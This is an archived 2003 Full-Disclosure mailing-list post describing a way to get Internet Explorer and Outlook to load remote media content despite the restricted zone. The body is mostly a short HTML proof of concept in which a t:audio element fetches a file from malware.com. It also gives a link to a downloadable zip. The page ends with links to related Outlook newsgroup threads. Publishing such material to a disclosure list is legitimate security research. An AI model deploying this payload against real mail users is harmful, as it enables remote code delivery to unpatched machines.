Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code

http-equiv_at_excite.com
Date: 09/12/03

  • Next message: Brown, Randy (InfoSec): "RE: [Full-Disclosure] RPC scanners"
    To: <full-disclosure@lists.netsys.com>
    Date: Fri, 12 Sep 2003 15:55:50 -0000
    
    

    <!--

    when viewing mail in recent versions of outlook it operates in the
    restricted zone ,eg no active scripting allowed to run, so these wont
    be exploitable unless someone proofs otherwise that is ;)

     -->

    <html xmlns:t>
    <head><style>
    t\:*{behavior:url(#default#time);display:none}</style></head><body>
    <t:audio t:src="http://www.malware.com/freek.asf" />
    </body></html>

    Trivial inline url flip in the restricted zone. WMP 8 and under.
    Unpatched since May 2003 should do the trick:

    http://www.malware.com/but.its.free.zip

    -- 
    http://www.malware.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: Brown, Randy (InfoSec): "RE: [Full-Disclosure] RPC scanners"

    Relevant Pages

    • Re: Outlook 2003 without Anti-Virus Tool
      ... is it safe to assume that Internet Explorer is ... Outlook 2003 is not going to let the user get at it by default. ... (Outlook 2003 reading pane doesn't allow script to run in the message since ... restricted zone or the user switches it over to Internet Zone, ...
      (microsoft.public.outlook)
    • Re: Message "You are now viewing this message in the internet zone
      ... Jerry wrote: ... Outlook reads messages in the Restricted Zone so that unusual ... Brian Tillman ...
      (microsoft.public.outlook)
    • Re: Outlook form appearing as jiggerygook in Outlook Express
      ... The problem with that is a form won't work for the recipients who have the default settings in OE. ... The default is restricted zone, and a form requires outside of that. ... >I have a form that gets sent to a group mail- it was created in Outlook, ... > all Outlook users don't have any problems seeing the form and using it ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Script Error Message in Outlook Express 6
      ... Tools | Options | Security and set OE to the Restricted Zone. ... That should remove active scripting and do away with the error messages. ... MS-MVP Outlook Express ... When I try to open any E-mails in Outlook Express 6 I get a Internet ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Re: Active X
      ... I am using outlook 2003 and its only coming from this one user. ... have no problem in IE this just happens in outllook. ... allow ActiveX controls to run. ... You can modify your Restricted zone, ...
      (microsoft.public.outlook.interop)